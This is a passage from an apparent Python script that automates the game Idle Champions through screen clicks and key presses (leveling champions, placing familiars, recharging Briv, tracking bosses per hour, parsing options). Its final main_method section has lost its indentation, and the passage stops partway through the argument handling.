    """Finish the current adventure by image recognition: find and click the
    Complete button, click Skip repeatedly, then click Continue. Gives up
    after 40 attempts."""
    complete = ""
    skipped = False
    for attempt in range(40):
        print("attempt %s" % attempt)
        if not complete:
            foreground_or_start()
            time.sleep(0.5)
            pyautogui.press("r")
            time.sleep(0.5)
            complete = click_image('complete.png', 'complete2.png')
            if complete:
                print("Completed Adventure")
        if complete and not skipped:
            print("Skipping")
            for _ in range(16):
                menu_offset_click(position, 430, 120)
            skipped = True
        if click_image('continue.png'):
            print("Viewed Adventure Stats")
            break
        time.sleep(2.0)
def start_it_up(adventure):
    """Launch an adventure from the city map: Mad Wizard for the default
    adventure, Terror otherwise."""
    # Open the adventure picker by clicking on the city.
    click_offset(324, 682, duration=0.1, delay=0.1, tag="Launch Adventure Picker")
    foreground_or_start()
    time.sleep(0.5)
    if adventure == DEFAULT_ADVENTURE:
        pick_y, pick_tag = 160, "Launch Mad Wizard"
    else:
        pick_y, pick_tag = 220, "Launch Terror"
    click_offset(366, pick_y, duration=0.1, delay=0.1, tag=pick_tag)
    # time to settle (and for initial hit)
    time.sleep(0.5)
    click_offset(801, 558, duration=0.1, delay=0.1, tag="Click Start Objective")
def menu_offset(pos, x, y):
    """Point at (x, y) relative to the centre anchor derived from *pos*
    (half of the 1380x895 window)."""
    anchor_x = pos.x + 1380 / 2
    anchor_y = pos.y + 895 / 2
    return pyautogui.Point(anchor_x + x, anchor_y + y)
def menu_offset_click(pos, x, y):
    """Click at (x, y) relative to the centre anchor derived from *pos*."""
    pyautogui.click(pos.x + 1380 / 2 + x, pos.y + 895 / 2 + y)
    time.sleep(0.2)
def menu_offset_move(pos, x, y):
    """Glide (2 s) to (x, y) relative to the centre anchor derived from *pos*."""
    pyautogui.moveTo(pos.x + 1380 / 2 + x, pos.y + 895 / 2 + y, 2.0)
    time.sleep(0.2)
def place_click_familiars(num_familiars):
    """Deploy click familiars: hold "f" while clicking the damage leveler
    and up to six battlefield positions (2, 4, or 6 clickers).

    BUG FIX: the early returns used to skip keyUp("f"), leaving the key
    held down indefinitely; the release now always runs via try/finally.
    """
    pyautogui.keyDown("f")
    try:
        click_offset(180, 695, duration=0.1, delay=0.1, tag="Click Damage Leveler")
        click_offset(933, 240, duration=0.1, delay=0.1, tag="1st Battlefield Clicker")
        if num_familiars < 4:
            return
        click_offset(869, 325, duration=0.1, delay=0.1, tag="2nd Battlefield Clicker")
        click_offset(1000, 325, duration=0.1, delay=0.1, tag="3rd Battlefield Clicker")
        if num_familiars < 6:
            return
        click_offset(869, 391, duration=0.1, delay=0.1, tag="5th Battlefield Clicker")
        click_offset(1000, 391, duration=0.1, delay=0.1, tag="6th Battlefield Clicker")
    finally:
        pyautogui.keyUp("f")
def restart_stacking(args):
    """Recharge by restarting the app: quit, wait args.charge seconds while
    the stacks build offline, then relaunch."""
    shutdown_app(args.keyboard_shutdown)
    time.sleep(args.charge)
    startup_idle_champions()
def charge_briv(level, plus, images, args):
    """Recharge Briv's haste stacks, either by restarting the app
    (args.restart) or by walking back to a safe zone and idling for
    args.charge seconds, then resume progress. Always returns True.
    NOTE(review): the *images* parameter is unused.
    """
    screenshare = args.screenshare
    charge_time = args.charge
    briv_target = args.target - args.briv_recharge_areas
    restart = args.restart
    print("Recharging Briv starting at %s" % (datetime.datetime.now()))
    GO_BACK_DELAY=2.0
    # "g"/"w" toggle formation/progress state before charging.
    pyautogui.press("g")
    time.sleep(0.5)
    pyautogui.press("w")
    # time to settle
    time.sleep(2.0)
    # restart charging ... so good
    if restart:
        if on_boss():
            verbose_print(" %d & boss; go back one" % level)
            pyautogui.press("left")
            time.sleep(GO_BACK_DELAY)
        shutdown_app(args.keyboard_shutdown)
        accept_screen_share(screenshare)
        time.sleep(charge_time)
        startup_idle_champions()
        time.sleep(5.0)
    # manual charging ... still better than a poke in the eye with a sharp stick
    else:
        # make sure we are not on a boss or zone without a spinner
        while True:
            verbose_print("charge_briv %d %s" % (level, plus))
            if on_boss():
                verbose_print(" %d & boss; go back one" % level)
                pyautogui.press("left")
                time.sleep(GO_BACK_DELAY)
                break
            elif level == briv_target:
                verbose_print(" Just go for it %d" % level)
                break
                # NOTE(review): everything below this break is unreachable,
                # and it references undefined names x, y and level_images.
                pyautogui.press("left")
                time.sleep(GO_BACK_DELAY)
                try:
                    level, plus = get_current_level(x, y, level_images, False)
                except Exception:
                    break
            elif level == briv_target + 6 and plus:
                pyautogui.press("left")
                time.sleep(GO_BACK_DELAY)
                pyautogui.press("left")
                time.sleep(GO_BACK_DELAY)
                break
            else:
                verbose_print(" Done")
                break
    # idle in place, periodically re-foregrounding and backing off bosses
    charging = charge_time
    while charging > 0.0:
        verbose_print("Charging Briv: %f more seconds" % (charging))
        if charging > CHARGE_INTERVAL:
            accept_screen_share(screenshare)
            foreground_or_start()
            if on_boss():
                print("%d & boss; go back one" % level)
                pyautogui.press("left")
            time.sleep(CHARGE_INTERVAL)
            charging -= CHARGE_INTERVAL
        else:
            time.sleep(charging)
            break
    # start going forward again ... why is this sooooooo slow
    print("Resuming ...")
    foreground_or_start()
    pyautogui.press("left")
    time.sleep(1.5)
    pyautogui.press("q")
    time.sleep(0.25)
    pyautogui.press("g")
    time.sleep(0.25)
    pyautogui.press("q")
    return True
def remove_familiars(position, ult):
    """Double-click a familiar slot while holding "f" to remove familiars;
    the slot's horizontal offset depends on the ult index (4 or 5 shift it
    further right)."""
    pyautogui.keyDown("f")
    time.sleep(0.1)
    offset = 230 + {4: 90, 5: 120}.get(ult, 0)
    for _ in range(2):
        menu_offset_click(position, offset, 10)
    pyautogui.keyUp("f")
def place_other_familiars(position, familiars):
    """Place extra click-damage familiars via the 'f' overlay.

    position: anchor passed through to menu_offset_click.
    familiars: how many familiars the player owns; each threshold >= 3..7
    places one more at a fixed offset from `position`.
    """
    pyautogui.keyDown("f")
    # place more click familiars
    # drag_image('familiar.png', 135, -135)
    if familiars >= 3:
        menu_offset_click(position, 135, -195)
    # drag_image('familiar.png', 275, -135)
    if familiars >= 4:
        menu_offset_click(position, 275, -195)
    # drag_image('familiar.png', 135, -195)
    if familiars >= 5:
        menu_offset_click(position, 135, -135)
    # drag_image('familiar.png', 275, -195)
    if familiars >= 6:
        menu_offset_click(position, 275, -135)
    # drag_image('familiar.png', 195, -255)
    if familiars >= 7:
        menu_offset_click(position, 195, -255)
    pyautogui.keyUp("f")
    return
    # NOTE(review): everything below is unreachable (dead code after the
    # unconditional return above) — presumably legacy champion-slot placement
    # kept for reference; confirm intent before deleting.
    # binwin (slot 3)
    # drag_image('familiar.png', -225, 165)
    menu_offset_click(position, -225, 165)
    if familiars <= 8:
        return
    # Shandie (slot 7)
    drag_image('familiar.png', 100, 165)
    if familiars <= 9:
        return
    # jarlaxle or stoki (slot 4)
    drag_image('familiar.png', -120, 165)
    if familiars <= 10:
        return
    # Deekin (slot 1)
    # drag_image('familiar.png', -450, 165)
    pyautogui.keyUp("f")
# Pixel coordinates of the specialization "select" buttons, keyed by which
# choice out of how many options (e.g. "2_of_3" = second button of three).
# Used by level_champ_with_keys via click_spec_at; presumably app-window
# relative — TODO confirm against click_spec_at.
SPECS = {
    "1_of_2": {"x": 515, "y": 585},
    "2_of_2": {"x": 760, "y": 585},
    "1_of_3": {"x": 384, "y": 585},
    "2_of_3": {"x": 635, "y": 585},
    "3_of_3": {"x": 885, "y": 585},
}
# Per-champion F-key leveling data (see level_champ_with_keys):
#   key   - F key that levels this champ; pressed 'bs' times
#   bs    - number of key presses used when leveling the champ
#   as    - not used in the visible code; presumably an additional/spec
#           level count — TODO confirm
#   spec  - which specialization button to click (index into SPECS)
#   short - not used in the visible code; presumably a CLI shorthand —
#           TODO confirm
TEAM_DEFINITIONS = {
    # Speedsters
    "briv": {"key": "f5", "bs": 19, "as": 30, "spec": "1_of_3", "short":"-B",},
    "shandie": {"key": "f6", "bs": 24, "as": 30, "spec": "1_of_3", "short":"-S",},
    "havi": {"key": "f10", "bs": 21, "as": 0, "spec": "1_of_2", "short":"-H",},
    "deekin": {"key": "f1", "bs": 16, "as": 0, "spec": "3_of_3", "short":"-D",},
    "melf": {"key": "f12", "bs": 12, "as": 30, "spec": "2_of_3", "short":"-M",},
    "sentry": {"key": "f4", "bs": 20, "as": 30, "spec": "2_of_3", "short":"-Y",},
    "hew": {"key": "f8", "bs": 15, "as": 30, "spec": "2_of_2", "short":"-W",},
    # Extras
    "viper": {"key": "f7", "bs": 12, "as": 30, "spec": "2_of_2", },
    "binwin": {"key": "f3", "bs": 21, "as": 30, "spec": "2_of_2", },
    "drizzt": {"key": "f9", "bs": 19, "as": 30, "spec": "1_of_2", },
    "omin": {"key": "f3", "bs": 20, "as": 70, "spec": "2_of_3", },
    "jarlaxle":{"key": "f4", "bs": 12, "as": 30, "spec": "2_of_2", },
    # fix
    "minsc": {"key": "f7", "bs": 4, "as": 30, "spec": "2_of_2", },
    "strix": {"key": "f11", "bs": 16, "as": 30, "spec": "3_of_3", },
    "hitch": {"key": "f7", "bs": 4, "as": 30, "spec": "2_of_2", },
}
def level_champ_with_keys(args, champ, between_champs=0.1):
    """Level one champion by pressing its F key 'bs' times.

    Returns the F key used (so callers can keep pressing it), or None after
    printing an error when the champ has no TEAM_DEFINITIONS entry.  When
    modron is not handling specialization, also clicks the champ's spec
    button from SPECS.
    """
    entry = TEAM_DEFINITIONS.get(champ)
    if entry is None:
        print('ERROR: champ "%s" has no definition for F Key leveling' % champ)
        return None
    verbose_print("Leveling %s %s" % (champ, entry))
    key = entry['key']
    for _ in range(entry['bs']):
        pyautogui.press(key)
        time.sleep(DEFAULT_DELAY)
    if not args.modron_specialization:
        button = SPECS[entry["spec"]]
        click_spec_at(button["x"], button["y"], delay=0.3, tag=champ)
    time.sleep(between_champs)
    return key
def level_team_with_keys(args, team, between_champs=0.1):
    """Level the whole speed team via F-key presses and load formation 'g'.

    team: comma-separated champ names (keys of TEAM_DEFINITIONS).
    Shandie/Havi are leveled first so their ults can fire early; returns the
    list of F keys used so callers could keep leveling.
    """
    # NOTE(review): these are substring tests on the raw team string, not
    # exact-name matches after splitting — confirm that is intended.
    have_shandie = ("shandie" in team)
    have_hew = ("hew" in team)
    leveling_keys = []
    if have_shandie:
        key = level_champ_with_keys(args, "shandie", between_champs=between_champs)
        leveling_keys.append(key)
    if "havi" in team:
        key = level_champ_with_keys(args, "havi", between_champs=between_champs)
        leveling_keys.append(key)
        # fire ult! once
        pyautogui.press("1")
    if have_shandie:
        pyautogui.press("2")
    # Level everyone else in team order; the two already handled are skipped.
    for champ in team.split(','):
        champ = champ.strip()
        if champ in ["shandie", "havi"]:
            continue
        key = level_champ_with_keys(args, champ, between_champs=between_champs)
        leveling_keys.append(key)
    # TODO: wait here for shandie to start dashing ...
    # Load the Formation
    pyautogui.press('q')
    time.sleep(DEFAULT_DELAY)
    pyautogui.press('g')
    time.sleep(DEFAULT_DELAY)
    # more rounds of leveling based on those F keys
    for i in range(0, 20):
        for f_key in leveling_keys:
            pyautogui.press(f_key)
    # Spam Hew's ult key a few times if he is on the team.
    if have_hew:
        for i in range(0, 20):
            pyautogui.press(args.hew_ult)
            time.sleep(0.1)
    return leveling_keys
def click_third_spec(delay=0.0):
    """Click the third specialization 'select' button, then park the mouse above it."""
    found = click_image("select.png", click_image_index=2)
    if found:
        pyautogui.moveRel(0, -120, duration=0.1)
    time.sleep(delay)
def click_second_spec(delay=0.0):
    """Click the second specialization 'select' button, then park the mouse above it."""
    found = click_image("select.png", click_image_index=1)
    if found:
        pyautogui.moveRel(0, -120, duration=0.1)
    time.sleep(delay)
def click_first_spec(delay=0.0):
    """Click the first specialization 'select' button, then park the mouse above it.

    Unlike click_second_spec/click_third_spec, this always moves the mouse
    even if the image was not found (preserved from the original).  The
    original also carried unreachable code after its return (a moveRel plus
    an 8-click loop); that dead code has been removed.
    """
    click_image("select.png")
    pyautogui.moveRel(0, -120, duration=0.1)
    time.sleep(delay)
def click_with_position(image, target, offset_x=0, offset_y=0, click=True):
    """Move to (and optionally click) `target`, locating `image` when target is falsy.

    Returns the position used so callers can cache it and skip the image
    search next time.
    """
    verbose_print("click_with_position(%s,%s)" % (image, str(target)))
    if not target:
        # No cached position yet: give the screen a moment and find the image.
        time.sleep(0.2)
        target = locate(image)
    pyautogui.moveTo(target.x + offset_x, target.y + offset_y, duration=0.0)
    time.sleep(0.1)
    if not click:
        return target
    pyautogui.click()
    time.sleep(0.2)
    return target
def handle_extras(args):
    """Press f1..f12 once for each corresponding --F1..--F12 flag set on args.

    Replaces the original twelve copy-pasted if-blocks with a single loop;
    order (f1 first, f12 last) and behavior are unchanged.
    """
    for i in range(1, 13):
        if getattr(args, "F%d" % i):
            pyautogui.press("f%d" % i)
def get_bool_config(cfg, key, default):
    """Read cfg['idler'][key] as a boolean, returning `default` on any failure.

    Accepts the same spellings (case-insensitively) as the old
    distutils.util.strtobool, which was removed in Python 3.12 (PEP 632):
    truthy: y, yes, t, true, on, 1; falsy: n, no, f, false, off, 0.
    Missing keys, missing sections, non-string values, and unrecognized
    spellings all fall back to `default`, matching the original's broad
    except clause.
    """
    truthy = {"y", "yes", "t", "true", "on", "1"}
    falsy = {"n", "no", "f", "false", "off", "0"}
    try:
        value = cfg['idler'][key].lower()
        if value in truthy:
            return True
        if value in falsy:
            return False
    except Exception:
        pass
    return default
def add_champs_to_parser(parser):
    """Add --<champ>/--no-<champ> flag pairs for every champ in TEAM_DEFINITIONS.

    Both flags share dest "use_<champ>" (default False); --<champ> stores
    True, --no-<champ> stores False.

    Bug fix: the original iterated `for name, v in TEAM_DEFINITIONS:`, which
    walks the dict *keys* and tries to unpack each key string into two
    names, raising ValueError on any key not exactly two characters long.
    The values were never used, so iterate the keys directly.
    """
    for name in TEAM_DEFINITIONS:
        lc = name.lower()
        parser.add_argument("--"+lc, help="Use "+name,
                            default=False,
                            dest="use_"+lc,
                            action="store_true")
        parser.add_argument("--no-"+lc, help="Don't use "+name,
                            dest="use_"+lc,
                            action="store_false")
def load_config():
    """Load layered configuration into the module-level ConfigParser.

    Order (lowest to highest priority): ./defaults.cfg (required — exits if
    missing), ./local.cfg (optional), ~/.idler (optional, created by
    `./idler.py init`).  Also applies the top_x/top_y window hint when
    use_top_hint is enabled.
    """
    global config, top_x, top_y
    # defaults.cfg is mandatory; bail out if it is missing.
    required = "./defaults.cfg"
    if not os.path.exists(required):
        print("Missing %s file" % required)
        sys.exit(0)
    config.read(required)
    # Optional overrides, read lowest-priority first.
    for optional in ("./local.cfg", os.path.join(Path.home(), '.idler')):
        if os.path.exists(optional):
            config.read(optional)
    if config.getboolean("idler", "use_top_hint"):
        top_x = config.getint("idler", "top_hint_x")
        top_y = config.getint("idler", "top_hint_y")
        verbose_print("Config top_x,top_y = %d,%d" % (top_x, top_y))
# object to support logging all of tracking logs to a permanent file
class Tee(object):
    """Duplicate everything written to stdout into a log file (like tee(1)).

    Constructing an instance opens the file and installs the instance as
    sys.stdout; deleting it restores the original stream and closes the
    file.

    Bug fix: flush() now flushes both sinks — the original only flushed the
    file, so the real console could lag behind the log.
    """
    def __init__(self, name, mode):
        self.file = open(name, mode)
        self.stdout = sys.stdout
        sys.stdout = self
    def __del__(self):
        # Restore the original stdout before closing our log file.
        sys.stdout = self.stdout
        self.file.close()
    def write(self, data):
        self.file.write(data)
        self.stdout.write(data)
    def flush(self):
        self.file.flush()
        self.stdout.flush()
# object to support logging all of tracking logs to a permanent file
class Tracker(object):
    """Track gem-farming loop statistics and print bosses-per-hour (BPH).

    start_loop() is called once per loop: the first call only records the
    start times; each later call counts a completed run and prints per-run
    and per-session BPH.  An optional logfile is opened for flushing
    (NOTE(review): nothing in the visible code ever writes to it — confirm
    intended).

    Bug fixes vs original:
      * flush() no longer raises AttributeError when no logfile was given
        (self.file is None in that case).
      * start_loop() guards against a zero-length interval, which would
        have raised ZeroDivisionError.
    """
    file = None
    started = False
    verbose = False
    zones = None
    bosses_per_run = None
    start_of_session = None
    total_runs = 0
    start_of_run = None
    longest_run = None
    bosses_this_session = None
    def __init__(self, now, zones=0, verbose=False, logfile=None, log_mode="a"):
        self.start_of_session = None
        self.start_of_run = None
        self.zones = zones
        # Bosses come every 5 zones, so a full run clears zones/5 of them.
        self.bosses_per_run = self.zones / 5
        self.bosses_this_session = 0
        self.total_runs = 0
        self.started = False
        self.verbose = verbose
        if logfile:
            self.file = open(logfile, log_mode)
    def elapsed(self, td):
        """Split a timedelta into (hours, minutes, seconds) floats."""
        seconds = td.total_seconds()
        hours = seconds // 3600
        minutes = (seconds % 3600) // 60
        seconds = seconds % 60
        return hours, minutes, seconds
    def start_loop(self, now, level, plus):
        """Record the start of a loop; from the second call on, log rates."""
        if not self.started:
            self.start_of_run = now
            self.start_of_session = now
            self.started = True
            return
        self.total_runs += 1
        print("Loop %d started: %s: %d%s" % (self.total_runs, now, level, "+" if plus else ""))
        self.bosses_this_session += self.bosses_per_run
        run_elapsed = now - self.start_of_run
        # `or 1.0` guards against two calls in the same instant.
        run_seconds = run_elapsed.total_seconds() or 1.0
        run_bph = float(self.bosses_per_run) / run_seconds * 60.0 * 60.0
        run_hours, run_minutes, run_seconds = self.elapsed(run_elapsed)
        session_elapsed = now - self.start_of_session
        session_seconds = session_elapsed.total_seconds() or 1.0
        session_bph = float(self.bosses_this_session) / session_seconds * 60.0 * 60.0
        session_hours, session_minutes, session_seconds = self.elapsed(session_elapsed)
        print("Session: %d:%d:%d BPH: %.2f Run: %d:%d:%d BPH: %.2f" % (
            session_hours, session_minutes, session_seconds,
            session_bph,
            run_hours, run_minutes, run_seconds,
            run_bph,
        ))
        self.start_of_run = now
    def flush(self):
        # No-op when no logfile was configured (original raised here).
        if self.file:
            self.file.flush()
    def start_tracking(self, now, level, plus):
        """Announce the start of a farming session."""
        print("Gem farming session started: %s: with detected level %d%s" % (now, level, "+" if plus else ""))
# argparse help epilog (dedented at parser construction).  Typo fix:
# "will by 50 bounties" -> "will buy 50 bounties".
epilog="""Commands:
The following commands are available:
1. Gem Farming with or without Modron Automation (see README for more details):
./idler.py modron
./idler.py no-modron
2. Buying bounties quickly, the following commands will buy 50 bounties of the given type:
./idler.py small 5
./idler.py medium 5
3. Opening silver chests quickly, the following command will open 5 batches of 50 silver chests:
./idler.py silver 5
4. Quick reset stacking, assuming Briv is at a level where he can no longer advance:
./idler.py --charge 15 stack 5
"""
def main_method():
global top_x, top_y, top_offset, debugging, verbose, infinite_loop
load_config()
# get defaults from config file
# have_briv = get_bool_config(config, "use_briv", have_briv)
# have_havilar = get_bool_config(config, "use_havilar", have_havilar)
# have_binwin = get_bool_config(config, "use_binwin", have_binwin)
# have_deekin = get_bool_config(config, "use_deekin", have_deekin)
# have_sentry = get_bool_config(config, "use_sentry", have_sentry)
# have_shandie = get_bool_config(config, "use_shandie", have_shandie)
# have_melf = get_bool_config(config, "use_melf", have_melf)
# have_hew = get_bool_config(config, "use_hew", have_melf)
steam_start_with_image = get_bool_config(config, "steam_start_with_image", True)
steam_start_x = get_bool_config(config, "steam_start_x", True)
default_charge_time = config.getfloat("idler", "briv_charge_time")
briv_restart_charging = config.getboolean("idler", "briv_restart_charging")
briv_boss_handling = config.getboolean("idler", "briv_boss_handling")
level_images = load_level_images()
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent(epilog)
)
parser.add_argument("--tee", help="Also send output to a logfile (appending)",
default=None,
type=str)
parser.add_argument("--keyboard-shutdown",
dest="keyboard_shutdown",
default=config.getboolean("idler", "keyboard_shutdown"),
help="Shutdown %s by sending CMD-Q" % APP_NAME, action="store_true")
parser.add_argument("--no-keyboard-shutdown", "--close",
dest="keyboard_shutdown",
help="Shutdown %s by closing the app." % APP_NAME,
action="store_false")
# meta
parser.add_argument("-m", "--mirt", help="Set reasonable defaults for a Mirt run (no Deekin)",
action="store_true")
parser.add_argument("-v","--vajra", help="Set reasonable defaults for a Vajra run (no Minsc)",
action="store_true")
parser.add_argument("-a", "--adventure", default=DEFAULT_ADVENTURE,
help="Adventure to run (madwizard, terror) (default %s)" % DEFAULT_ADVENTURE,
type=str)
parser.add_argument("-f", "--familiars", default=NUM_FAMILIARS,
help="How many familiars do you have (default %d)" % NUM_FAMILIARS, type=int)
parser.add_argument("--target", default=config.getint("idler", "modron_target"),
help="What zone is your Modron core set to restart (default %d)" % config.getint("idler", "modron_target"),
type=int)
parser.add_argument("--briv-recharge-areas", "--briv-areas", default=config.getint("idler", "briv_recharge_areas"),
help="How many areas before your Modron area goal should Briv start recharging (default is %s which works for Triple Skip Briv, use 15 for Quad skip Briv)" % config.getint("idler", "briv_recharge_areas"),
type=int)
parser.add_argument("--charge", default=default_charge_time,
help="Amount of time for Briv charging, either method (default %f)" % default_charge_time,
type=float)
parser.add_argument("--no-boss", default=default_charge_time,
help="Amount of time for Briv charging, either method (default %f)" % default_charge_time,
type=float)
#how to spec
parser.add_argument("--specialization", default=config.getboolean("idler", "modron_specialization"),
dest="modron_specialization",
help="Specialization automaticaly done by modron.",
action="store_true")
parser.add_argument("--no-specialization", "--fkeys",
dest="modron_specialization",
help="Specialization not automaticaly done by modron.",
action="store_false")
#skip boss
parser.add_argument("--briv-boss", default=briv_boss_handling,
dest="briv_boss",
help="Remove Briv if on a boss (Quad Briv) via formation 'e'",
action="store_true")
parser.add_argument("--no-briv-boss",
dest="briv_boss",
help="No special handling for Briv on bosses",
action="store_false")
#restart
parser.add_argument("--restart", default=briv_restart_charging,
dest="restart",
help="Briv charging via quit/restart",
action="store_true")
parser.add_argument("--no-restart", help="Briv charging by waiting.",
dest="restart",
action="store_false")
parser.add_argument("--charge-shandie", default=config.getint("idler", "charge_shandie"),
dest="charge_shandie",
help="Charge Shandie's dash on startup (default %d seconds)" % 0,
type=int)
parser.add_argument("--size", default="small",
help="Size of bounties to open (small or medium,default small)",
type=str)
parser.add_argument("-r", "--runloops", default=GEM_LOOPS,
help="How many loops gem run (default %d)" % GEM_LOOPS,
type=int)
parser.add_argument("-l", "--level", default=DEFAULT_LEVEL_DELAY,
help="How many seconds to wait before leveling champs (default %d)" % DEFAULT_LEVEL_DELAY,
type=int)
parser.add_argument("--F1", help="Activate slot 1st hero (1 level).", action="store_true")
parser.add_argument("--F2", help="Activate slot 2nd hero (1 level).", action="store_true")
parser.add_argument("--F3", help="Activate slot 3rd hero (1 level).", action="store_true")
parser.add_argument("--F4", help="Activate slot 4th hero (1 level).", action="store_true")
parser.add_argument("--F5", help="Activate slot 5th hero (1 level).", action="store_true")
parser.add_argument("--F6", help="Activate slot 6th hero (1 level).", action="store_true")
parser.add_argument("--F7", help="Activate slot 7th hero (1 level).", action="store_true")
parser.add_argument("--F8", help="Activate slot 8th hero (1 level).", action="store_true")
parser.add_argument("--F9", help="Activate slot 9th hero (1 level).", action="store_true")
parser.add_argument("--F10", help="Activate slot 10th hero (1 level).", action="store_true")
parser.add_argument("--F11", help="Activate slot 11th hero (1 level).", action="store_true")
parser.add_argument("--F12", help="Activate slot 12th hero (1 level).", action="store_true")
parser.add_argument("--modron", help="Depend on Modron to reset and level.",
default=config.getboolean('idler', 'use_modron'),
dest="use_modron",
action="store_true")
parser.add_argument("--no-modron", help="Manual resetting of levels.",
dest="use_modron",
action="store_false")
parser.add_argument("--save_mismatch", help="When checking level, save any mismatches.",
action="store_true")
parser.add_argument("--in-progress", help="Start up with a game in progress.",
action="store_true")
parser.add_argument("-O", "--odds", help="Briv odds of jumping",
type=float, default=99.0)
parser.add_argument("--header", help="Height of the Idle Champions application header",
type=int,
default=config.getint("idler", "header_height"))
parser.add_argument("--countdown",
help="Seconds to wait before starting command (default %d)" % COUNTDOWN,
type=int,
default=COUNTDOWN, )
parser.add_argument("-c", "--confirm_buy", help="Confirm buying gold chests (skips Yes/No prompt).",
action="store_true")
parser.add_argument("-x", "--experimental", help="Don't use this.",
action="store_true")
parser.add_argument("--verbose", help="Debugging aid.", action="store_true")
parser.add_argument("--debug", help="Debugging aid, very noisy.", action="store_true")
parser.add_argument("--screenshare", "--ss",
help="Screen share accept active.",
action="store_true")
parser.add_argument('-F', '--formation', metavar='formation', type=str,
help="Formation key to use to set initial formations and familiars",
default=None)
parser.add_argument("--havi-ult", default=config.get('idler', 'havi_ult'),
help="Key that hits Havi's ult. (default %s)" % config.get('idler', 'havi_ult'),
type=str)
parser.add_argument("--hew-ult", default=config.get('idler', 'hew_ult'),
help="Key that hits Hews's ult. (default %s)" % config.get('idler', 'hew_ult'),
type=str)
# Commands and arguments
parser.add_argument('command', metavar='command', type=str, nargs="?",
help="""Action to perform (modron, stats, run, silver, stack, bounty, keep-alive)
run: loop on adventures for N minutes to acquire gems and/or patron currency
press: press the specified key every few seconds
buy: buy N gold chests """, default="stats")
parser.add_argument('loops', metavar='N', type=int, nargs="?",
help="""Argument (N) to the action (number of chests/minutes)""",
default=0)
parser.add_argument('extras', metavar='N', type=int, nargs="*",
help="""Argument (N+) to the action (e.g. bs contracts)""",
default=0)
args = parser.parse_args()
verbose = args.verbose
debugging = args.debug
verbose_print("Command = %s" % args.command)
debug_print("Debugging On")
top_offset = args.header
patron = "None"
speed_team = config.get("idler", "speed_team")
if args.tee:
Tee(args.tee, "a")
if args.vajra:
speed_team = config.get("idler", "vajra_speed_team")
patron = "Vajra"
if args.mirt:
speed_team = config.get("idler", "mirt_speed_team")
patron = "Mirt"
# Apply args to speed team
have_briv = False
if "briv" in speed_team:
have_briv = True
champs_list = []
if have_briv:
champs_list.append("briv")
if have_celeste:
champs_list.append("celeste")
if have_donaar:
champs_list.append("donaar")
if have_deekin:
champs_list.append("deekin")
if have_shandie:
champs_list.append("shandie")
if have_melf:
champs_list.append("melf")
if have_minsc:
champs_list.append("minsc")
if have_viper:
champs_list.append("viper")
if have_binwin:
champs_list.append("binwin")
if have_havilar:
champs_list.append("havilar")
if have_sentry:
champs_list.append("sentry")
if have_gold:
champs_list.append("[gold]")
champs = ",".join(champs_list)
if args.screenshare:
print("Sreenshare mode!")
if args.command == "pytest":
print("merged: %s" % list(pyautogui.locateAllOnScreen('./merged.png')))
print("merged2: %s" % list(pyautogui.locateAllOnScreen('./merged2.png')))
print("merged3: %s" % list(pyautogui.locateAllOnScreen('./merged3.png')))
sys.exit(0)
if args.command == "stats":
player_stats = load_player_json()
dump_stats(args, player_stats)
print("Champs you can put in your team:")
champs = ",".join([key for key in TEAM_DEFINITIONS.keys()])
print(" %s" % champs)
sys.exit(0)
if args.command == "init":
print("Configuring system, this will take a minute or two ...")
time.sleep(5)
init_config_path = os.path.join(Path.home(), '.idler')
init_config = configparser.ConfigParser(allow_no_value=True)
if os.path.exists(init_config_path):
print("Updating ~/.idler file")
init_config.read(init_config_path)
else:
print("Creating ~/.idler file")
if not config.getboolean("idler", "shortcut_restarting"):
print("Looking for the steam app")
# move mouse to top corner
steam = activate_app("Steam")
time.sleep(1)
# click [Play] or [Stop]
print("Looking for Play or Stop")
try:
location = locate("steam_play.png", "steam_stop.png")
if "steam" not in init_config:
init_config.add_section("steam")
init_config["steam"]["; middle pixel of the Idle Champions [play] button on Steam"] = None
init_config["steam"]["start_with_image"] = "no"
init_config["steam"]["start_x"] = str(int(location.x))
init_config["steam"]["start_y"] = str(int(location.y))
print("Found Steam Play/Stop Location: %s" % str(location))
except Exception as e:
print("Error finding Steam Play/Stop location: %s" % str(e))
print("Hover over the blue menu icon in the top left corner of the Idle Champions game. Do not click!")
time.sleep(5.0)
print("Looking for the %s app" % APP_NAME)
ic_app = activate_app(APP_NAME)
time.sleep(1)
for tries in range(0, 2):
try:
# location = locate("menu.png")
# top_x, top_y = top_location_from_menu(int(location.x), int(location.y))
print("Screen shot in ", end='')
for i in range(10,0,-1):
print('%d ...' % i, end='', flush=True)
time.sleep(1)
top_x, top_y, found = hunt_for_menu(level_images)
if not found:
continue
if "idler" not in init_config:
init_config.add_section("idler")
init_config["idler"]["; top left pixel of the app when launched"] = None
init_config["idler"]["use_top_hint"] = "yes"
init_config["idler"]["top_hint_x"] = str(top_x)
init_config["idler"]["top_hint_y"] = str(top_y)
print("Found app top x,y: %d,%d" % (top_x, top_y))
break
except Exception as e:
print("Error finding Menu Icon location: %s" % str(e))
print("Checking init with current zone ...")
level, plus = get_current_zone(level_images=level_images, save=True, tries=1)
if level > 0:
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, plus, on_boss()))
else:
print("Zone not found, check again with ./idler.py zone")
print("Updating ~/.idler.py")
with open(init_config_path, 'w') as f:
f.write("# created by idler.py, a Idle Champions script engine\n")
f.write("# Warning: edit at on risk\n")
init_config.write(f)
sys.exit(0)
if args.command == "Tracker" or args.command == "Track":
print("Test Tracker ...")
try:
now = datetime.datetime.now()
tracker = Tracker(now=now-datetime.timedelta(minutes=11, seconds=12),
zones=args.target,
verbose=verbose,)
print("start track %s" % now)
tracker.start_tracking(now, 20, False)
print("start loop %s" % now)
tracker.start_loop(now, 221, False)
now = now + datetime.timedelta(minutes=11, seconds=12)
print("start loop %s" % now)
tracker.start_loop(now, 1, False)
now = now + datetime.timedelta(minutes=10, seconds=33)
print("start loop T %s" % now)
tracker.start_loop(now, 1, True)
now = now + datetime.timedelta(minutes=12, seconds=1)
print("start loop %s" % now)
tracker.start_loop(now, 6, False)
except Exception as e:
print("Error: %s" % str(e))
sys.exit(0)
if args.command == "testhunt":
print("Test Hunt for Menu ...")
print("Screen shot in ", end='')
for i in range(10,0,-1):
print('%d ...' % i, end='', flush=True)
time.sleep(1)
for round in range(0,5):
print("")
print("######## Round %d ############" % round)
x, y, found = hunt_for_menu(level_images)
if round == 4:
break
print("Next screen shot in ", end='')
for i in range(5,0,-1):
print('%d ...' % i, end='', flush=True)
time.sleep(1)
sys.exit(0)
if args.command == "mouse":
